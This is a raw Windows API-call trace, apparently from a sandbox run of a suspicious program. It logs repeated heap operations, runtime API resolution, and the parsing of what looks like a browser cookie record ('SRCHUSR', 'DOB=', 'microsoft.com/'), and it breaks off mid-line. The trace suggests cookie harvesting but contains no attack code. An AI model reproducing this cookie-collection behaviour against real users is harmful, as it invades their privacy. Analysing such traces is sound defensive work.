RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x72) returned 0x625040 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625040, Size=0xe5) returned 0x627450 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x73) returned 0x625040 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625040, Size=0xf9) returned 0x623040 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7d) returned 0x625040 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625040, Size=0xfb) returned 0x622f40 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7e) returned 0x625040 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7e) returned 0x627550 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x627550, Size=0xff) returned 0x623a40 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6250d0, Size=0x305) returned 0x627550 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x623a40 | out: hHeap=0x5f0000) returned 1 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625040 | out: hHeap=0x5f0000) returned 1 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x622f40 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x623040 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627450 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d80 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625ca0 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621340 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618290 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621280 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6217c0 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6138f0 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b90 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613650 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636200 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620550 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.428] GetProcessHeap () returned 0x5f0000 [0181.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.429] GetProcessHeap () returned 0x5f0000 [0181.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635590 | out: hHeap=0x5f0000) returned 1 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613800 | out: hHeap=0x5f0000) returned 1 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.430] lstrlenA (lpString="\n") returned 1 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f490 [0181.430] lstrcpyA (in: lpString1=0x61f490, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.430] lstrlenA (lpString="\nSRCHUSR\nDOB=20210927\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472722941\n30913481\n") returned 82 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x53) returned 0x618170 [0181.430] lstrcpyA (in: lpString1=0x618170, lpString2="\nSRCHUSR\nDOB=20210927\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472722941\n30913481\n" | out: lpString1="\nSRCHUSR\nDOB=20210927\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472722941\n30913481\n") returned="\nSRCHUSR\nDOB=20210927\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472722941\n30913481\n" [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f530 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f660 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.430] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] GetProcessHeap () returned 0x5f0000 [0181.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5a0 [0181.431] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.431] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f660, Size=0x5) returned 0x61f540 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f530, Size=0x53) returned 0x618a10 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.431] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f670 [0181.431] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.431] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f540, Size=0x9) returned 0x61f510 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f480 [0181.431] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.431] GetProcessHeap () returned 0x5f0000 [0181.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f590 [0181.432] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.432] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x11) returned 0x6363a0 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f4a0 [0181.432] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f4a0 [0181.432] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.432] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x21) returned 0x613950 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f660 [0181.432] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] GetProcessHeap () returned 0x5f0000 [0181.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.432] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.433] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613950, Size=0x41) returned 0x620140 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.433] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f4a0 [0181.433] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.433] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620140, Size=0x29) returned 0x613950 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618170 | out: hHeap=0x5f0000) returned 1 [0181.433] lstrlenA (lpString="/") returned 1 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f590 [0181.433] lstrcpyA (in: lpString1=0x61f590, lpString2="/" | out: lpString1="/") returned="/" [0181.433] lstrlenA (lpString="DOB=20210927") returned 12 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f5c0 [0181.433] lstrcpyA (in: lpString1=0x61f5c0, lpString2="DOB=20210927" | out: lpString1="DOB=20210927") returned="DOB=20210927" [0181.433] lstrlenA (lpString="DOB=20210927") returned 12 [0181.433] GetProcessHeap () returned 0x5f0000 [0181.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f550 [0181.433] lstrcpyA (in: lpString1=0x61f550, lpString2="DOB=20210927" | out: lpString1="DOB=20210927") returned="DOB=20210927" [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f530 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f540 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.434] lstrlenA (lpString="DOB=20210927") returned 12 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f590 [0181.434] lstrcpyA (in: lpString1=0x61f590, lpString2="DOB=20210927" | out: lpString1="DOB=20210927") returned="DOB=20210927" [0181.434] lstrlenA (lpString="") returned 0 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f660 [0181.434] lstrcpyA (in: lpString1=0x61f660, lpString2="" | out: lpString1="") returned="" [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.434] lstrlenA (lpString="\r\n") returned 2 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f510 [0181.434] lstrcpyA (in: lpString1=0x61f510, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.434] lstrlenA (lpString="||") returned 2 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f510 [0181.434] lstrcpyA (in: lpString1=0x61f510, lpString2="||" | out: lpString1="||") returned="||" [0181.434] lstrlenA (lpString="|") returned 1 [0181.434] GetProcessHeap () returned 0x5f0000 [0181.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f620 [0181.434] lstrcpyA (in: lpString1=0x61f620, lpString2="|" | out: lpString1="|") returned="|" [0181.434] lstrlenA (lpString="1024") returned 4 [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f4a0 [0181.435] lstrcpyA (in: lpString1=0x61f4a0, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f670 [0181.435] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.435] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.435] lstrlenA (lpString="1820274944") returned 10 [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f600 [0181.435] lstrcpyA (in: lpString1=0x61f600, lpString2="1820274944" | out: lpString1="1820274944") returned="1820274944" [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f490 [0181.435] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.435] StrToInt64ExA (in: pszString="1820274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.435] lstrlenA (lpString="|") returned 1 [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.435] lstrcpyA (in: lpString1=0x61f580, lpString2="|" | out: lpString1="|") returned="|" [0181.435] lstrlenA (lpString="1024") returned 4 [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f490 [0181.435] lstrcpyA (in: lpString1=0x61f490, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.435] GetProcessHeap () returned 0x5f0000 [0181.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f630 [0181.436] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.436] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.436] lstrlenA (lpString="1820274944") returned 10 [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5a0 [0181.436] lstrcpyA (in: lpString1=0x61f5a0, lpString2="1820274944" | out: lpString1="1820274944") returned="1820274944" [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f590 [0181.436] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.436] StrToInt64ExA (in: pszString="1820274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.436] lstrlenA (lpString="|") returned 1 [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f560 [0181.436] lstrcpyA (in: lpString1=0x61f560, lpString2="|" | out: lpString1="|") returned="|" [0181.436] lstrlenA (lpString="|") returned 1 [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.436] lstrcpyA (in: lpString1=0x61f520, lpString2="|" | out: lpString1="|") returned="|" [0181.436] lstrlenA (lpString="|") returned 1 [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f530 [0181.436] lstrcpyA (in: lpString1=0x61f530, lpString2="|" | out: lpString1="|") returned="|" [0181.436] lstrlenA (lpString="|") returned 1 [0181.436] GetProcessHeap () returned 0x5f0000 [0181.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f630 [0181.437] lstrcpyA (in: lpString1=0x61f630, lpString2="|" | out: lpString1="|") returned="|" [0181.437] lstrlenA (lpString="|") returned 1 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f550 [0181.437] lstrcpyA (in: lpString1=0x61f550, lpString2="|" | out: lpString1="|") returned="|" [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f590 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5b0 [0181.437] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.437] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.437] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f590, Size=0x1) returned 0x61f5b0 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f590 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.437] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] GetProcessHeap () returned 0x5f0000 [0181.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.438] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.438] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f590, Size=0xb) returned 0x61f5c0 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] RtlAllocateHeap (HeapHandle=0x5f0000, 